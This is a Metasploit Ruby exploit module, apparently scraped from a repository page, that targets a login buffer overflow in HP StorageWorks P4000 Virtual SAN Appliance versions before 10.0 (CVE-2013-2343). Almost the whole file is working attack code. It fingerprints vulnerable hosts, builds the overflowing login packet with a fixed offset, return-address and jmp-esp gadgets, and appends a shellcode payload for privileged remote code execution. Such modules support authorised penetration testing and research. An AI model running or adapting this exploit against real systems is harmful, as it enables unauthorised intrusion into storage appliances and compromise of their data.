Path: blob/master/modules/exploits/linux/misc/hp_vsa_login_bof.rb
19669 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(12update_info(13info,14'Name' => "HP StorageWorks P4000 Virtual SAN Appliance Login Buffer Overflow",15'Description' => %q{16This module exploits a buffer overflow vulnerability found in HP's StorageWorks17P4000 VSA on versions prior to 10.0. The vulnerability is due to an insecure usage18of the sscanf() function when parsing login requests. This module has been tested19successfully on the HP VSA 9 Virtual Appliance.20},21'License' => MSF_LICENSE,22'Author' => [23'e6af8de8b1d4b2b6d5ba2610cbf9cd38', # Vulnerability Discovery24'juan vazquez' # Metasploit module25],26'References' => [27['CVE', '2013-2343'],28['OSVDB', '94701'],29['ZDI', '13-179'],30['URL', 'http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c03661318']31],32'Payload' => {33'BadChars' => "\x2f\x00\x0d\x0a",34'Space' => 780,35'DisableNops' => true,36'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -350037},38'DefaultOptions' => {39'EXITFUNC' => 'thread'40},41'Platform' => ['linux'],42'Arch' => ARCH_X86,43'Targets' => [44[45'HP VSA 9',46{47'Version' => '9.0.0',48'Offset' => 3446,49'Ret' => 0x0804EB34, # pop ebp # ret # from hydra50'FakeObject' => 0x08072E58, # from hydra data51'JmpEsp' => 0x08050CB8 # push esp # ret # from hydra52}53]54],55'Privileged' => true,56'DisclosureDate' => '2013-06-28',57'DefaultTarget' => 0,58'Notes' => {59'Reliability' => UNKNOWN_RELIABILITY,60'Stability' => UNKNOWN_STABILITY,61'SideEffects' => UNKNOWN_SIDE_EFFECTS62}63)64)6566register_options(67[68OptPort.new('RPORT', [true, 'The remote port', 13838])69]70)71end7273def check74connect75packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"#{target['Version']}\"")76vprint_status("#{rhost}:#{rport} Sending login packet to check...")77sock.put(packet)78res = sock.get_once79disconnect8081if res and res =~ /OK/ and res =~ /Login/82return Exploit::CheckCode::Appears83elsif res and res =~ /FAILED/ and res =~ /version/84return Exploit::CheckCode::Detected85end8687return Exploit::CheckCode::Safe88end8990def generate_packet(data)91pkt = "\x00\x00\x00\x00\x00\x00\x00\x01"92pkt << [data.length + 1].pack("N*")93pkt << "\x00\x00\x00\x00"94pkt << "\x00\x00\x00\x00\x00\x00\x00\x00"95pkt << "\x00\x00\x00\x14\xff\xff\xff\xff"96pkt << data97pkt << "\x00"9899pkt100end101102def exploit103connect104print_status("#{rhost}:#{rport} Sending login packet")105my_bof = rand_text(target['Offset'])106my_bof << [target.ret].pack("V")107my_bof << [target['FakeObject']].pack("V") # Pointer to Fake Object in order to survive LHNSessionManager::SendMessage before ret108my_bof << [target['JmpEsp']].pack("V")109my_bof << payload.encoded110111packet = generate_packet("login:/#global$agent/#{my_bof}/#{rand_text_alpha(5)}/Version \"1\" ") # Fake version in order to ret asap112sock.put(packet)113disconnect114end115end116117118